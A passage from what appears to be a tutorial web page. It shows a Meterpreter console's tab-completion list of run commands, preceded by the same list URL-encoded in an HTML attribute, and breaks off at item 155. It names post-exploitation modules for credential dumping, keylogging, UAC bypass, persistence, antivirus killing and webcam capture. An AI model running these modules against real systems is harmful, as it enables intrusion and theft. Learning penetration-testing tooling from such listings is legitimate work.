ather%2Fcheckcontainer%5Cnrun%20post%2Flinux%2Fgather%2Fcheckvm%5Cnrun%20post%2Flinux%2Fgather%2Fecryptfs_creds%5Cnrun%20post%2Flinux%2Fgather%2Fenum_commands%5Cnrun%20post%2Flinux%2Fgather%2Fenum_configs%5Cnrun%20post%2Flinux%2Fgather%2Fenum_containers%5Cnrun%20post%2Flinux%2Fgather%2Fenum_nagios_xi%5Cnrun%20post%2Flinux%2Fgather%2Fenum_network%5Cnrun%20post%2Flinux%2Fgather%2Fenum_protections%5Cnrun%20post%2Flinux%2Fgather%2Fenum_psk%5Cnrun%20post%2Flinux%2Fgather%2Fenum_system%5Cnrun%20post%2Flinux%2Fgather%2Fenum_users_history%5Cnrun%20post%2Flinux%2Fgather%2Fgnome_commander_creds%5Cnrun%20post%2Flinux%2Fgather%2Fgnome_keyring_dump%5Cnrun%20post%2Flinux%2Fgather%2Fhashdump%5Cnrun%20post%2Flinux%2Fgather%2Fmount_cifs_creds%5Cnrun%20post%2Flinux%2Fgather%2Fopenvpn_credentials%5Cnrun%20post%2Flinux%2Fgather%2Fphpmyadmin_credsteal%5Cnrun%20post%2Flinux%2Fgather%2Fpptpd_chap_secrets%5Cnrun%20post%2Flinux%2Fgather%2Ftor_hiddenservices%5Cnrun%20post%2Flinux%2Fmanage%2Fdns_spoofing%5Cnrun%20post%2Flinux%2Fmanage%2Fdownload_exec%5Cnrun%20post%2Flinux%2Fmanage%2Fiptables_removal%5Cnrun%20post%2Flinux%2Fmanage%2Fpseudo_shell%5Cnrun%20post%2Flinux%2Fmanage%2Fsshkey_persistence%5Cnrun%20post%2Fmulti%2Fescalate%2Faws_create_iam_user%5Cnrun%20post%2Fmulti%2Fescalate%2Fcups_root_file_read%5Cnrun%20post%2Fmulti%2Fescalate%2Fmetasploit_pcaplog%5Cnrun%20post%2Fmulti%2Fgather%2Fapple_ios_backup%5Cnrun%20post%2Fmulti%2Fgather%2Faws_ec2_instance_metadata%5Cnrun%20post%2Fmulti%2Fgather%2Faws_keys%5Cnrun%20post%2Fmulti%2Fgather%2Fcheck_malware%5Cnrun%20post%2Fmulti%2Fgather%2Fchrome_cookies%5Cnrun%20post%2Fmulti%2Fgather%2Fdbvis_enum%5Cnrun%20post%2Fmulti%2Fgather%2Fdns_bruteforce%5Cnrun%20post%2Fmulti%2Fgather%2Fdns_reverse_lookup%5Cnrun%20post%2Fmulti%2Fgather%2Fdns_srv_lookup%5Cnrun%20post%2Fmulti%2Fgather%2Fdocker_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fenum_hexchat%5Cnrun%20post%2Fmulti%2Fgather%2Fenum_software_versions%5Cnrun%20post%2Fmulti%2Fgather%2Fenum_vbox%5Cnrun%20post%2Fmulti%2Fgather%2Fenv%5Cnrun%20post%2Fmulti%2Fgather%2Ffetchmailrc_creds%5Cnrun%20post%2Fmulti%2Fgather%2Ffilezilla_client_cred%5Cnrun%20post%2Fmulti%2Fgather%2Ffind_vmx%5Cnrun%20post%2Fmulti%2Fgather%2Ffirefox_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fgpg_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fgrub_creds%5Cnrun%20post%2Fmulti%2Fgather%2Firssi_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fjboss_gather%5Cnrun%20post%2Fmulti%2Fgather%2Fjenkins_gather%5Cnrun%20post%2Fmulti%2Fgather%2Flastpass_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fmaven_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fmulti_command%5Cnrun%20post%2Fmulti%2Fgather%2Fnetrc_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fpgpass_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fpidgin_cred%5Cnrun%20post%2Fmulti%2Fgather%2Fping_sweep%5Cnrun%20post%2Fmulti%2Fgather%2Fremmina_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fresolve_hosts%5Cnrun%20post%2Fmulti%2Fgather%2Frsyncd_creds%5Cnrun%20post%2Fmulti%2Fgather%2Frubygems_api_key%5Cnrun%20post%2Fmulti%2Fgather%2Frun_console_rc_file%5Cnrun%20post%2Fmulti%2Fgather%2Fskype_enum%5Cnrun%20post%2Fmulti%2Fgather%2Fssh_creds%5Cnrun%20post%2Fmulti%2Fgather%2Fthunderbird_creds%5Cnrun%20post%2Fmulti%2Fgather%2Ftomcat_gather%5Cnrun%20post%2Fmulti%2Fgather%2Fubiquiti_unifi_backup%5Cnrun%20post%2Fmulti%2Fgather%2Fwlan_geolocate%5Cnrun%20post%2Fmulti%2Fgeneral%2Fclose%5Cnrun%20post%2Fmulti%2Fgeneral%2Fexecute%5Cnrun%20post%2Fmulti%2Fgeneral%2Fwall%5Cnrun%20post%2Fmulti%2Fmanage%2Fautoroute%5Cnrun%20post%2Fmulti%2Fmanage%2Fdbvis_add_db_admin%5Cnrun%20post%2Fmulti%2Fmanage%2Fdbvis_query%5Cnrun%20post%2Fmulti%2Fmanage%2Fhsts_eraser%5Cnrun%20post%2Fmulti%2Fmanage%2Fmulti_post%5Cnrun%20post%2Fmulti%2Fmanage%2Fopen%5Cnrun%20post%2Fmulti%2Fmanage%2Fplay_youtube%5Cnrun%20post%2Fmulti%2Fmanage%2Frecord_mic%5Cnrun%20post%2Fmulti%2Fmanage%2Fscreensaver%5Cnrun%20post%2Fmulti%2Fmanage%2Fscreenshare%5Cnrun%20post%2Fmulti%2Fmanage%2Fset_wallpaper%5Cnrun%20post%2Fmulti%2Fmanage%2Fshell_to_meterpreter%5Cnrun%20post%2Fmulti%2Fmanage%2Fsudo%5Cnrun%20post%2Fmulti%2Fmanage%2Fsystem_session%5Cnrun%20post%2Fmulti%2Fmanage%2Fupload_exec%5Cnrun%20post%2Fmulti%2Fmanage%2Fzip%5Cnrun%20post%2Fmulti%2Frecon%2Flocal_exploit_suggester%5Cnrun%20post%2Fmulti%2Frecon%2Fmultiport_egress_traffic%5Cnrun%20post%2Fmulti%2Frecon%2Fsudo_commands%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_brocade%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_cisco%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_f5%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_juniper%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_mikrotik%5Cnrun%20post%2Fnetworking%2Fgather%2Fenum_vyos%5Cnrun%20post%2Fosx%2Fadmin%2Fsay%5Cnrun%20post%2Fosx%2Fcapture%2Fkeylog_recorder%5Cnrun%20post%2Fosx%2Fcapture%2Fscreen%5Cnrun%20post%2Fosx%2Fescalate%2Ftccbypass%5Cnrun%20post%2Fosx%2Fgather%2Fapfs_encrypted_volume_passwd%5Cnrun%20post%2Fosx%2Fgather%2Fautologin_password%5Cnrun%20post%2Fosx%2Fgather%2Fenum_adium%5Cnrun%20post%2Fosx%2Fgather%2Fenum_airport%5Cnrun%20post%2Fosx%2Fgather%2Fenum_chicken_vnc_profile%5Cnrun%20post%2Fosx%2Fgather%2Fenum_colloquy%5Cnrun%20post%2Fosx%2Fgather%2Fenum_keychain%5Cnrun%20post%2Fosx%2Fgather%2Fenum_messages%5Cnrun%20post%2Fosx%2Fgather%2Fenum_osx%5Cnrun%20post%2Fosx%2Fgather%2Fhashdump%5Cnrun%20post%2Fosx%2Fgather%2Fpassword_prompt_spoof%5Cnrun%20post%2Fosx%2Fgather%2Fsafari_lastsession%5Cnrun%20post%2Fosx%2Fgather%2Fvnc_password_osx%5Cnrun%20post%2Fosx%2Fmanage%2Fmount_share%5Cnrun%20post%2Fosx%2Fmanage%2Frecord_mic%5Cnrun%20post%2Fosx%2Fmanage%2Fsonic_pi%5Cnrun%20post%2Fosx%2Fmanage%2Fvpn%5Cnrun%20post%2Fosx%2Fmanage%2Fwebcam%5Cnrun%20post%2Fsolaris%2Fescalate%2Fpfexec%5Cnrun%20post%2Fsolaris%2Fescalate%2Fsrsexec_readline%5Cnrun%20post%2Fsolaris%2Fgather%2Fcheckvm%5Cnrun%20post%2Fsolaris%2Fgather%2Fenum_packages%5Cnrun%20post%2Fsolaris%2Fgather%2Fenum_services%5Cnrun%20post%2Fsolaris%2Fgather%2Fhashdump%5Cnrun%20post%2Fwindows%2Fcapture%2Fkeylog_recorder%5Cnrun%20post%2Fwindows%2Fcapture%2Flockout_keylogger%5Cnrun%20post%2Fwindows%2Fescalate%2Fdroplnk%5Cnrun%20post%2Fwindows%2Fescalate%2Fgetsystem%5Cnrun%20post%2Fwindows%2Fescalate%2Fgolden_ticket%5Cnrun%20post%2Fwindows%2Fescalate%2Fms10_073_kbdlayout%5Cnrun%20post%2Fwindows%2Fescalate%2Fscreen_unlock%5Cnrun%20post%2Fwindows%2Fescalate%2Funmarshal_cmd_exec%5Cnrun%20post%2Fwindows%2Fgather%2Fad_to_sqlite%5Cnrun%20post%2Fwindows%2Fgather%2Farp_scanner%5Cnrun%20post%2Fwindows%2Fgather%2Favast_memory_dump%5Cnrun%20post%2Fwindows%2Fgather%2Fbitcoin_jacker%5Cnrun%20post%2Fwindows%2Fgather%2Fbitlocker_fvek%5Cnrun%20post%2Fwindows%2Fgather%2Fbloodhound%5Cnrun%20post%2Fwindows%2Fgather%2Fcachedump%5Cnrun%20post%2Fwindows%2Fgather%2Fcheckvm%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Favira_password%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fbulletproof_ftp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fcoreftp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fcredential_collector%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fdomain_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fdynazip_log%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fdyndns%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fenum_cred_store%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fenum_laps%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fenum_picasa_pwds%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fepo_sql%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ffilezilla_server%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fflashfxp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fftpnavigator%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fftpx%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fgpp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fheidisql%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fidm%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fimail%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fimvu%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmcafee_vse_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmdaemon_cred_collector%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmeebo%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmremote%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fmssql_local_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fnimbuzz%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Foutlook%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fpulse_secure%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fpurevpn_cred_collector%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Frazer_synapse%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Frazorsql%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Frdc_manager_creds%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsecurecrt%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fskype%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsmartermail%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsmartftp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fspark_im%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsso%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fsteam%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fteamviewer_passwords%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ftortoisesvn%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ftotal_commander%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Ftrillian%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fvnc%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fwindows_autologin%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fwinscp%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fwsftp_client%5Cnrun%20post%2Fwindows%2Fgather%2Fcredentials%2Fxshell_xftp_password%5Cnrun%20post%2Fwindows%2Fgather%2Fdnscache_dump%5Cnrun%20post%2Fwindows%2Fgather%2Fdumplinks%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_bitlocker%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_computers%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_groups%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_managedby_groups%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_service_principal_names%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_to_wordlist%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_user_comments%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ad_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_applications%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_artifacts%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_av_excluded%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_chrome%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_computers%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_db%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_devices%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_dirperms%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain_group_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain_tokens%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domain_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_domains%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_emet%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_files%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_hostfile%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_hyperv_vms%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ie%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_logged_on_users%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_ms_product_keys%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_muicache%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_onedrive%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_patches%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_powershell_env%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_prefetch%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_proxy%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_putty_saved_sessions%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_services%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_shares%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_snmp%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_termserv%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_tokens%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_tomcat%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_trusted_locations%5Cnrun%20post%2Fwindows%2Fgather%2Fenum_unattend%5Cnrun%20post%2Fwindows%2Fgather%2Ffile_from_raw_ntfs%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fbrowser_history%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fduqu_check%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fenum_drives%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Ffanny_bmp_check%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fimager%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Fnbd_server%5Cnrun%20post%2Fwindows%2Fgather%2Fforensics%2Frecovery_files%5Cnrun%20post%2Fwindows%2Fgather%2Fhashdump%5Cnrun%20post%2Fwindows%2Fgather%2Flocal_admin_search_enum%5Cnrun%20post%2Fwindows%2Fgather%2Flsa_secrets%5Cnrun%20post%2Fwindows%2Fgather%2Fmake_csv_orgchart%5Cnrun%20post%2Fwindows%2Fgather%2Fmemory_grep%5Cnrun%20post%2Fwindows%2Fgather%2Fnetlm_downgrade%5Cnrun%20post%2Fwindows%2Fgather%2Fntds_grabber%5Cnrun%20post%2Fwindows%2Fgather%2Fntds_location%5Cnrun%20post%2Fwindows%2Fgather%2Foutlook%5Cnrun%20post%2Fwindows%2Fgather%2Fphish_windows_credentials%5Cnrun%20post%2Fwindows%2Fgather%2Fpsreadline_history%5Cnrun%20post%2Fwindows%2Fgather%2Fresolve_sid%5Cnrun%20post%2Fwindows%2Fgather%2Freverse_lookup%5Cnrun%20post%2Fwindows%2Fgather%2Fscreen_spy%5Cnrun%20post%2Fwindows%2Fgather%2Fsmart_hashdump%5Cnrun%20post%2Fwindows%2Fgather%2Ftcpnetstat%5Cnrun%20post%2Fwindows%2Fgather%2Fusb_history%5Cnrun%20post%2Fwindows%2Fgather%2Fwin_privs%5Cnrun%20post%2Fwindows%2Fgather%2Fwmic_command%5Cnrun%20post%2Fwindows%2Fgather%2Fword_unc_injector%5Cnrun%20post%2Fwindows%2Fmanage%2Fadd_user%5Cnrun%20post%2Fwindows%2Fmanage%2Farchmigrate%5Cnrun%20post%2Fwindows%2Fmanage%2Fchange_password%5Cnrun%20post%2Fwindows%2Fmanage%2Fclone_proxy_settings%5Cnrun%20post%2Fwindows%2Fmanage%2Fdelete_user%5Cnrun%20post%2Fwindows%2Fmanage%2Fdownload_exec%5Cnrun%20post%2Fwindows%2Fmanage%2Fdriver_loader%5Cnrun%20post%2Fwindows%2Fmanage%2Fenable_rdp%5Cnrun%20post%2Fwindows%2Fmanage%2Fenable_support_account%5Cnrun%20post%2Fwindows%2Fmanage%2Fexec_powershell%5Cnrun%20post%2Fwindows%2Fmanage%2Fexecute_dotnet_assembly%5Cnrun%20post%2Fwindows%2Fmanage%2Fforward_pageant%5Cnrun%20post%2Fwindows%2Fmanage%2Fhashcarve%5Cnrun%20post%2Fwindows%2Fmanage%2Fie_proxypac%5Cnrun%20post%2Fwindows%2Fmanage%2Finject_ca%5Cnrun%20post%2Fwindows%2Fmanage%2Finject_host%5Cnrun%20post%2Fwindows%2Fmanage%2Finstall_python%5Cnrun%20post%2Fwindows%2Fmanage%2Finstall_ssh%5Cnrun%20post%2Fwindows%2Fmanage%2Fkillav%5Cnrun%20post%2Fwindows%2Fmanage%2Fmigrate%5Cnrun%20post%2Fwindows%2Fmanage%2Fmssql_local_auth_bypass%5Cnrun%20post%2Fwindows%2Fmanage%2Fmulti_meterpreter_inject%5Cnrun%20post%2Fwindows%2Fmanage%2Fnbd_server%5Cnrun%20post%2Fwindows%2Fmanage%2Fpeinjector%5Cnrun%20post%2Fwindows%2Fmanage%2Fpersistence_exe%5Cnrun%20post%2Fwindows%2Fmanage%2Fportproxy%5Cnrun%20post%2Fwindows%2Fmanage%2Fpowershell%2Fbuild_net_code%5Cnrun%20post%2Fwindows%2Fmanage%2Fpowershell%2Fexec_powershell%5Cnrun%20post%2Fwindows%2Fmanage%2Fpowershell%2Fload_script%5Cnrun%20post%2Fwindows%2Fmanage%2Fpptp_tunnel%5Cnrun%20post%2Fwindows%2Fmanage%2Fpriv_migrate%5Cnrun%20post%2Fwindows%2Fmanage%2Fpxeexploit%5Cnrun%20post%2Fwindows%2Fmanage%2Freflective_dll_inject%5Cnrun%20post%2Fwindows%2Fmanage%2Fremove_ca%5Cnrun%20post%2Fwindows%2Fmanage%2Fremove_host%5Cnrun%20post%2Fwindows%2Fmanage%2Frid_hijack%5Cnrun%20post%2Fwindows%2Fmanage%2Frollback_defender_signatures%5Cnrun%20post%2Fwindows%2Fmanage%2Frpcapd_start%5Cnrun%20post%2Fwindows%2Fmanage%2Frun_as%5Cnrun%20post%2Fwindows%2Fmanage%2Frun_as_psh%5Cnrun%20post%2Fwindows%2Fmanage%2Fsdel%5Cnrun%20post%2Fwindows%2Fmanage%2Fshellcode_inject%5Cnrun%20post%2Fwindows%2Fmanage%2Fsshkey_persistence%5Cnrun%20post%2Fwindows%2Fmanage%2Fsticky_keys%5Cnrun%20post%2Fwindows%2Fmanage%2Fvmdk_mount%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_create%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_list%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_mount%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_set_storage%5Cnrun%20post%2Fwindows%2Fmanage%2Fvss_storage%5Cnrun%20post%2Fwindows%2Fmanage%2Fwdigest_caching%5Cnrun%20post%2Fwindows%2Fmanage%2Fwebcam%5Cnrun%20post%2Fwindows%2Frecon%2Fcomputer_browser_discovery%5Cnrun%20post%2Fwindows%2Frecon%2Foutbound_ports%5Cnrun%20post%2Fwindows%2Frecon%2Fresolve_ip%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_bss_list%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_current_connection%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_disconnect%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_probe_request%5Cnrun%20post%2Fwindows%2Fwlan%2Fwlan_profile%5Cnrun%20powerdump%5Cnrun%20prefetchtool%5Cnrun%20process_memdump%5Cnrun%20remotewinenum%5Cnrun%20scheduleme%5Cnrun%20schelevator%5Cnrun%20schtasksabuse%5Cnrun%20scraper%5Cnrun%20screen_unlock%5Cnrun%20screenspy%5Cnrun%20search_dwld%5Cnrun%20service_manager%5Cnrun%20service_permissions_escalate%5Cnrun%20sound_recorder%5Cnrun%20srt_webdrive_priv%5Cnrun%20uploadexec%5Cnrun%20virtualbox_sysenter_dos%5Cnrun%20virusscan_bypass%5Cnrun%20vnc%5Cnrun%20webcam%5Cnrun%20winbf%5Cnrun%20winenum%5Cnrun%20wmic%22%7D" data-cke-widget-keep-attr="0" data-widget="codeSnippet"><code class="hljs language-bash">meterpreter > run
   
2. Display all 522 possibilities? (y or n)
   
3. run arp_scanner
   
4. run autoroute
   
5. run checkvm
   
6. run credcollect
   
7. run domain_list_gen
   
8. run dumplinks
   
9. run duplicate
   
10. run enum_chrome
    
11. run enum_firefox
    
12. run enum_logged_on_users
    
13. run enum_powershell_env
    
14. run enum_putty
    
15. run enum_shares
    
16. run enum_vmware
    
17. run event_manager
    
18. run exploit/multi/local/allwinner_backdoor
    
19. run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
    
20. run exploit/multi/local/xorg_x11_suid_server
    
21. run exploit/multi/local/xorg_x11_suid_server_modulepath
    
22. run exploit/windows/local/adobe_sandbox_adobecollabsync
    
23. run exploit/windows/local/agnitum_outpost_acs
    
24. run exploit/windows/local/alpc_taskscheduler
    
25. run exploit/windows/local/always_install_elevated
    
26. run exploit/windows/local/anyconnect_lpe
    
27. run exploit/windows/local/applocker_bypass
    
28. run exploit/windows/local/appxsvc_hard_link_privesc
    
29. run exploit/windows/local/ask
    
30. run exploit/windows/local/bits_ntlm_token_impersonation
    
31. run exploit/windows/local/bthpan
    
32. run exploit/windows/local/bypassuac
    
33. run exploit/windows/local/bypassuac_comhijack
    
34. run exploit/windows/local/bypassuac_dotnet_profiler
    
35. run exploit/windows/local/bypassuac_eventvwr
    
36. run exploit/windows/local/bypassuac_fodhelper
    
37. run exploit/windows/local/bypassuac_injection
    
38. run exploit/windows/local/bypassuac_injection_winsxs
    
39. run exploit/windows/local/bypassuac_sdclt
    
40. run exploit/windows/local/bypassuac_silentcleanup
    
41. run exploit/windows/local/bypassuac_sluihijack
    
42. run exploit/windows/local/bypassuac_vbs
    
43. run exploit/windows/local/bypassuac_windows_store_filesys
    
44. run exploit/windows/local/bypassuac_windows_store_reg
    
45. run exploit/windows/local/capcom_sys_exec
    
46. run exploit/windows/local/comahawk
    
47. run exploit/windows/local/current_user_psexec
    
48. run exploit/windows/local/cve_2017_8464_lnk_lpe
    
49. run exploit/windows/local/cve_2018_8453_win32k_priv_esc
    
50. run exploit/windows/local/cve_2019_1458_wizardopium
    
51. run exploit/windows/local/cve_2020_0668_service_tracing
    
52. run exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
    
53. run exploit/windows/local/cve_2020_0796_smbghost
    
54. run exploit/windows/local/cve_2020_1048_printerdemon
    
55. run exploit/windows/local/cve_2020_1054_drawiconex_lpe
    
56. run exploit/windows/local/cve_2020_1313_system_orchestrator
    
57. run exploit/windows/local/cve_2020_1337_printerdemon
    
58. run exploit/windows/local/cve_2020_17136
    
59. run exploit/windows/local/dnsadmin_serverlevelplugindll
    
60. run exploit/windows/local/docker_credential_wincred
    
61. run exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
    
62. run exploit/windows/local/gog_galaxyclientservice_privesc
    
63. run exploit/windows/local/ikeext_service
    
64. run exploit/windows/local/ipass_launch_app
    
65. run exploit/windows/local/lenovo_systemupdate
    
66. run exploit/windows/local/mov_ss
    
67. run exploit/windows/local/mqac_write
    
68. run exploit/windows/local/ms10_015_kitrap0d
    
69. run exploit/windows/local/ms10_092_schelevator
    
70. run exploit/windows/local/ms11_080_afdjoinleaf
    
71. run exploit/windows/local/ms13_005_hwnd_broadcast
    
72. run exploit/windows/local/ms13_053_schlamperei
    
73. run exploit/windows/local/ms13_081_track_popup_menu
    
74. run exploit/windows/local/ms13_097_ie_registry_symlink
    
75. run exploit/windows/local/ms14_009_ie_dfsvc
    
76. run exploit/windows/local/ms14_058_track_popup_menu
    
77. run exploit/windows/local/ms14_070_tcpip_ioctl
    
78. run exploit/windows/local/ms15_004_tswbproxy
    
79. run exploit/windows/local/ms15_051_client_copy_image
    
80. run exploit/windows/local/ms15_078_atmfd_bof
    
81. run exploit/windows/local/ms16_014_wmi_recv_notif
    
82. run exploit/windows/local/ms16_016_webdav
    
83. run exploit/windows/local/ms16_032_secondary_logon_handle_privesc
    
84. run exploit/windows/local/ms16_075_reflection
    
85. run exploit/windows/local/ms16_075_reflection_juicy
    
86. run exploit/windows/local/ms18_8120_win32k_privesc
    
87. run exploit/windows/local/ms_ndproxy
    
88. run exploit/windows/local/novell_client_nicm
    
89. run exploit/windows/local/novell_client_nwfs
    
90. run exploit/windows/local/ntapphelpcachecontrol
    
91. run exploit/windows/local/ntusermndragover
    
92. run exploit/windows/local/nvidia_nvsvc
    
93. run exploit/windows/local/panda_psevents
    
94. run exploit/windows/local/payload_inject
    
95. run exploit/windows/local/persistence
    
96. run exploit/windows/local/persistence_image_exec_options
    
97. run exploit/windows/local/persistence_service
    
98. run exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
    
99. run exploit/windows/local/powershell_cmd_upgrade
    
100. run exploit/windows/local/powershell_remoting
     
101. run exploit/windows/local/ppr_flatten_rec
     
102. run exploit/windows/local/ps_persist
     
103. run exploit/windows/local/ps_wmi_exec
     
104. run exploit/windows/local/pxeexploit
     
105. run exploit/windows/local/razer_zwopenprocess
     
106. run exploit/windows/local/registry_persistence
     
107. run exploit/windows/local/ricoh_driver_privesc
     
108. run exploit/windows/local/run_as
     
109. run exploit/windows/local/s4u_persistence
     
110. run exploit/windows/local/service_permissions
     
111. run exploit/windows/local/unquoted_service_path
     
112. run exploit/windows/local/virtual_box_guest_additions
     
113. run exploit/windows/local/virtual_box_opengl_escape
     
114. run exploit/windows/local/vss_persistence
     
115. run exploit/windows/local/webexec
     
116. run exploit/windows/local/windscribe_windscribeservice_priv_esc
     
117. run exploit/windows/local/wmi
     
118. run exploit/windows/local/wmi_persistence
     
119. run file_collector
     
120. run get_application_list
     
121. run get_env
     
122. run get_filezilla_creds
     
123. run get_local_subnets
     
124. run get_pidgin_creds
     
125. run get_valid_community
     
126. run getcountermeasure
     
127. run getgui
     
128. run gettelnet
     
129. run getvncpw
     
130. run hashdump
     
131. run hostsedit
     
132. run keylogrecorder
     
133. run killav
     
134. run metsvc
     
135. run migrate
     
136. run multi_console_command
     
137. run multi_meter_inject
     
138. run multicommand
     
139. run multiscript
     
140. run netenum
     
141. run packetrecorder
     
142. run panda_2007_pavsrv51
     
143. run persistence
     
144. run pml_driver_config
     
145. run post/aix/hashdump
     
146. run post/android/capture/screen
     
147. run post/android/gather/hashdump
     
148. run post/android/gather/sub_info
     
149. run post/android/gather/wireless_ap
     
150. run post/android/manage/remove_lock
     
151. run post/android/manage/remove_lock_root
     
152. run post/apple_ios/gather/ios_image_gather
     
153. run post/apple_ios/gather/ios_text_gather
     
154. run post/bsd/gather/hashdump
     
155. run post/firefox/gather/cookies
     
